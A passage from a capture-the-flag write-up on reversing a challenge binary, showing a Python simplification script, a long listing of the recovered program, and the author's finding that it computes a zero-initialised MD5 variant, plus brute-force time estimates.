len(set(ops)) == 1 
assert in1s == tuple(range(in1s[0], in1s[-1] + 1)) and in1s[0] &amp; 31 == 0 assert in2s == tuple(range(in2s[0], in2s[-1] + 1)) and in2s[0] &amp; 31 == 0 ncommands.append(f'A[{outs[0]&gt;&gt;5}] = A[{in1s[0]&gt;&gt;5}] {ops[0]} A[{in2s[0]&gt;&gt;5}]') else: rotl = (outs.index(min(outs) + 7) + 1) &amp; 31 ncommands.append(f'A[{outs[0]&gt;&gt;5}] = rotl(A[{in1s[0]&gt;&gt;5}] {ops[0]} A[{in2s[0]&gt;&gt;5}], {rotl})') assert [in1s[24 - 8 * (i // 8) + (i % 8)] - min(in1s) == i for i in range(32)] assert [in2s[24 - 8 * (i // 8) + (i % 8)] - min(in2s) == i for i in range(32)] idx += 32 else: chunk = commands[idx:idx+157] outs, ops, in1s, in2s = zip(*[BITW(cmd) for cmd in chunk]) assert outs.count(0xb40) == 63 and outs.count(0xb41) == 62 assert ops == ('^', '&amp;') + ('^', '^', '&amp;', '&amp;', '|') * 31 assert in1s.count(0xb40) == 0 and in1s.count(0xb41) == 93 assert in2s.count(0xb40) == 93 and in2s.count(0xb41) == 0 assert outs[33] &amp; 31 == 0 and in1s[32] &amp; 31 == 0 and in2s[32] &amp; 31 == 0 ncommands.append(f'A[{outs[33]&gt;&gt;5}] = A[{in1s[32]&gt;&gt;5}] + A[{in2s[32]&gt;&gt;5}]') idx += 157 print(len(ncommands)) with open('commands2.txt', 'w') as f: for cmd in ncommands: f.write(cmd + '\n') There were some tricky implementation details like rotl() somehow being part of the logic, but in the end we are left with a much simpler program with “only” 865 lines: A[9] = 0xffffffff A[125] = 0x0 A[126] = 0x0 A[127] = 0x0 A[128] = 0x0 A[0] = A[125] | A[8] A[1] = A[126] | A[8] A[2] = A[127] | A[8] A[3] = A[128] | A[8] A[10] = 0xd76aa478 A[11] = 0xe8c7b756 A[12] = 0x242070db A[13] = 0xc1bdceee A[14] = 0xf57c0faf A[15] = 0x4787c62a A[16] = 0xa8304613 A[17] = 0xfd469501 A[18] = 0x698098d8 A[19] = 0x8b44f7af A[20] = 0xffff5bb1 A[21] = 0x895cd7be A[22] = 0x6b901122 A[23] = 0xfd987193 A[24] = 0xa679438e A[25] = 0x49b40821 A[26] = 0xf61e2562 A[27] = 0xc040b340 A[28] = 0x265e5a51 A[29] = 0xe9b6c7aa A[30] = 0xd62f105d A[31] = 0x2441453 A[32] = 0xd8a1e681 A[33] = 0xe7d3fbc8 
A[34] = 0x21e1cde6 A[35] = 0xc33707d6 A[36] = 0xf4d50d87 A[37] = 0x455a14ed A[38] = 0xa9e3e905 A[39] = 0xfcefa3f8 A[40] = 0x676f02d9 A[41] = 0x8d2a4c8a A[42] = 0xfffa3942 A[43] = 0x8771f681 A[44] = 0x6d9d6122 A[45] = 0xfde5380c A[46] = 0xa4beea44 A[47] = 0x4bdecfa9 A[48] = 0xf6bb4b60 A[49] = 0xbebfbc70 A[50] = 0x289b7ec6 A[51] = 0xeaa127fa A[52] = 0xd4ef3085 A[53] = 0x4881d05 A[54] = 0xd9d4d039 A[55] = 0xe6db99e5 A[56] = 0x1fa27cf8 A[57] = 0xc4ac5665 A[58] = 0xf4292244 A[59] = 0x432aff97 A[60] = 0xab9423a7 A[61] = 0xfc93a039 A[62] = 0x655b59c3 A[63] = 0x8f0ccc92 A[64] = 0xffeff47d A[65] = 0x85845dd1 A[66] = 0x6fa87e4f A[67] = 0xfe2ce6e0 A[68] = 0xa3014314 A[69] = 0x4e0811a1 A[70] = 0xf7537e82 A[71] = 0xbd3af235 A[72] = 0x2ad7d2bb A[73] = 0xeb86d391 A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[74] A[4] = A[6] + A[10] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 7) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[75] A[4] = A[6] + A[11] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 12) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[76] A[4] = A[6] + A[12] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 17) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[77] A[4] = A[6] + A[13] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 22) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[78] A[4] = A[6] + A[14] A[0] = A[3] | A[8] A[3] = A[2] 
| A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 7) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[79] A[4] = A[6] + A[15] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 12) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[80] A[4] = A[6] + A[16] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 17) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[81] A[4] = A[6] + A[17] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 22) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[82] A[4] = A[6] + A[18] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 7) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[83] A[4] = A[6] + A[19] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 12) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[84] A[4] = A[6] + A[20] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 17) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[85] A[4] = A[6] + A[21] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 22) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ 
A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[86] A[4] = A[6] + A[22] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 7) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[87] A[4] = A[6] + A[23] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 12) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[88] A[4] = A[6] + A[24] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 17) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[89] A[4] = A[6] + A[25] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 22) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[75] A[4] = A[6] + A[26] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 5) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[80] A[4] = A[6] + A[27] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 9) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[85] A[4] = A[6] + A[28] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 14) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[74] A[4] = A[6] + A[29] A[0] = A[3] | A[8] A[3] = 
A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 20) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[79] A[4] = A[6] + A[30] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 5) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[84] A[4] = A[6] + A[31] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 9) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[89] A[4] = A[6] + A[32] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 14) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[78] A[4] = A[6] + A[33] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 20) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[83] A[4] = A[6] + A[34] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 5) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[88] A[4] = A[6] + A[35] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 9) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[77] A[4] = A[6] + A[36] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 14) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ 
A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[82] A[4] = A[6] + A[37] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 20) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[87] A[4] = A[6] + A[38] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 5) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[76] A[4] = A[6] + A[39] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 9) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[81] A[4] = A[6] + A[40] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 14) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[86] A[4] = A[6] + A[41] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 20) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[79] A[4] = A[6] + A[42] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 4) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[82] A[4] = A[6] + A[43] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 11) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[85] A[4] = A[6] + A[44] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 16) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] 
A[5] = A[4] + A[0] A[6] = A[5] + A[88] A[4] = A[6] + A[45] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 23) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[75] A[4] = A[6] + A[46] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 4) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[78] A[4] = A[6] + A[47] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 11) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[81] A[4] = A[6] + A[48] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 16) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[84] A[4] = A[6] + A[49] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 23) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[87] A[4] = A[6] + A[50] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 4) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[74] A[4] = A[6] + A[51] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 11) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[77] A[4] = A[6] + A[52] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 16) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[80] A[4] = A[6] + A[53] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 23) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] 
+ A[0] A[6] = A[5] + A[83] A[4] = A[6] + A[54] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 4) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[86] A[4] = A[6] + A[55] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 11) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[89] A[4] = A[6] + A[56] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 16) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[76] A[4] = A[6] + A[57] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 23) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[74] A[4] = A[6] + A[58] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 6) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[81] A[4] = A[6] + A[59] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 10) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[88] A[4] = A[6] + A[60] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 15) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[79] A[4] = A[6] + A[61] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 21) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[86] A[4] = A[6] + A[62] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 6) A[7] = 
A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[77] A[4] = A[6] + A[63] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 10) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[84] A[4] = A[6] + A[64] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 15) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[75] A[4] = A[6] + A[65] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 21) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[82] A[4] = A[6] + A[66] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 6) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[89] A[4] = A[6] + A[67] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 10) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[80] A[4] = A[6] + A[68] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 15) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[87] A[4] = A[6] + A[69] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 21) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[78] A[4] = A[6] + A[70] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 6) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] 
^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[85] A[4] = A[6] + A[71] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 10) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[76] A[4] = A[6] + A[72] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 15) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[83] A[4] = A[6] + A[73] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 21) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[125] + A[0] A[0] = A[5] | A[8] A[5] = A[126] + A[1] A[1] = A[5] | A[8] A[5] = A[127] + A[2] A[2] = A[5] | A[8] A[5] = A[128] + A[3] A[3] = A[5] | A[8] Failing with z3 The last thing to do now was to pass everything into z3, and boom get the flag… right? Well, it turned out not to be that simple. I had z3 running for a half an hour but still no output, so what was going on? I went back to the Ghidra decompilation for any clues to make it go faster. Apparently, I had missed something; a reference to __ctype_b_loc() in the code. __ctype_b_loc() is a libc function that is used in the implementations of certain C functions like isalpha() and isdigit(). More specifically, it returns a const unsigned short int* ctype_b_values[] where each entry contains a 16-bit bitmask in which the nth bit encodes the return value of one of the is*****() functions. Where is this used, you may ask? After the long stream of if statements, the program iterates through each byte of the flag (inside corctf{...}), and terminates the loop early if (ctype_b_values[flag[i]] &amp; 8) == 0. The 3rd bit corresponds to isalnum(), and a set bit means that the byte is alphanumeric. Therefore, the flag has to be alphanumeric. 
I applied this new constraint to z3 hoping it would output a solution this time, but was gutted to find that it still would not budge. However, this presents some new useful information; the brute-force search space is not 69,833,729,609,375, but 50*62^6 = 2,840,011,779,200 (50 choices for flag[16], since flag[16] + 1 and flag[16] + 4 must be alphanumeric as well, times 62^6 for the six remaining free bytes). That’s nearly a 25x improvement, but still no easy task. Even if each of the 865 instructions I would have to execute accounted for one clock cycle, it would still take 2,840,011,779,200 * 865 / (2*10^9) / 60 / 60 ~ 341 hours on a typical 2 GHz computer. At this point we had 14 hours left in the CTF, and it was also 3AM so I wanted to go to sleep. As one final effort for the night, I Googled one of the mysterious hexadecimal constants in the code to see if anything would pop up. I wasn’t expecting any results, until I started seeing MD5 pop up! Could it be that this entire program was implementing MD5? Indeed, after testing the program with different inputs, it was in fact MD5, but not entirely. Normally, the MD5 state is initialized to 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, but in the program these are all set to zero. Let’s just call this variant MD5-0. In any case, I went to sleep with this knowledge hoping to crack this the next day. The next day (I woke up bright and early at 11AM the next morning) Since no practical preimage attack on MD5 is known, the only option was to brute force MD5-0 over 2,840,011,779,200 possibilities, where the correct flag should produce a suffix of 19c603ba14353ce4. To test the feasibility of the brute force, I grabbed an online C implementation of MD5 and measured its speed. The baseline single-threaded performance on my machine reached around 8*10^6 hashes per second. While this seemed relatively fast to me, the actual running time on 4 cores would be a daunting 2,840,011,779,200 / (8*10^6) / 60 / 60 / 4 ~ 25 hours. 
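For anyone who wants to double-check the numbers, here is a small sketch that recounts the search space and the time estimate. The names ALNUM, anchors, rate and cores are mine, and it assumes the alphanumeric check only accepts ASCII letters and digits.

```python
import string

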